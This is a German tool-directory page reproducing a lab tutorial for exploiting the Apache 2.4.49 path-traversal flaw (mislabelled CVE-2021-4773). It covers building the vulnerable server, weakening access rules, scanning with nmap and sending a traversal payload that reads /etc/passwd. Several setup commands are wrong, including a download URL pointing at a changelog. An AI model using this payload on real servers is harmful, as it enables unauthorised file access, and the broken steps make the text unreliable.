Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-4773 — dies ist ein Praxisbeispiel, wie man die Schwachstelle CVE-2021-4773 mit einer virtuellen Maschine ausnutzt. | Kitploit
Tools/GitHubGitHub/alexs18/cve-2021-4773
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubalexs18/cve-2021-4773

CVE-2021-4773

dies ist ein Praxisbeispiel, wie man die Schwachstelle CVE-2021-4773 mit einer virtuellen Maschine ausnutzt.

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-4773

Dies ist ein Praxisbeispiel, wie die Schwachstelle CVE-2021-4773 mit einer virtuellen Maschine ausgenutzt werden kann.

Für dieses Tutorial benötigst du Folgendes:

  • eine virtuelle Maschine wie Kali Linux
  • eine virtuelle Maschine wie Ubuntu Server
  • Apache Version 2.4.49 installiert

Also los geht's. Wenn du zwei virtuelle Maschinen laufen hast, installierst du Apache Version 2.4.49 aus einem Archiv-Repository. Du findest diese Version hier: https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Installation und Konfiguration der anfälligen Version auf dem Ubuntu-Server

1 Als Erstes musst du auf deiner virtuellen Server-Maschine den folgenden Befehl ausführen:

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  oder wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2

2 Als Zweites musst du diese Version von Apache wie folgt entpacken:

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 Installiere das folgende Paket:

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 Führe die ausführbare Datei im Hauptverzeichnis (Dateiname configure) aus und verwende das Flag, um das Installationsverzeichnis anzugeben:

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 Kompiliere die anfällige Version:

root@kitploit:~
make

6 Installiere die anfällige Version:

root@kitploit:~
make install

7 Überprüfe die Version:

root@kitploit:~
ls /usr/local/apache2

8 Starte den Prozess:

root@kitploit:~
/usr/local/apache2/bin/apachectl start

9 Überprüfe den Prozess:

root@kitploit:~
ps aux | grep httpd

10 Konfiguriere die Schwachstelle: Finde die Datei /usr/local/apache2/conf/httpd.conf und konfiguriere das Verzeichnis admin. Finde den Tag directory und ändere Require all denied zu

root@kitploit:~
  Required all granted
  

Finde den Tag Files .ht* Required all denied zu

root@kitploit:~
  Required all granted

Die erste Änderung dient der Ausnutzung der Schwachstelle in der lokalen Umgebung, die zweite der Offenlegung in der realen Umgebung.

Ausnutzung der Schwachstelle in Kali Linux

1 Scanne die IP-Adresse mit nmap mit dem folgenden Befehl:

root@kitploit:~
nmap -sV ip_address

2 Führe einen curl oder wget durch, um den Apache-Server zu testen:

root@kitploit:~
curl ip_address oder wget ip_address

3 Überprüfe, wie die Schwachstelle auf der folgenden Seite ausgenutzt wird, wenn du die Syntax verstehen möchtest:

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

Oder verwende einfach das folgende Payload:

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Tool herunterladen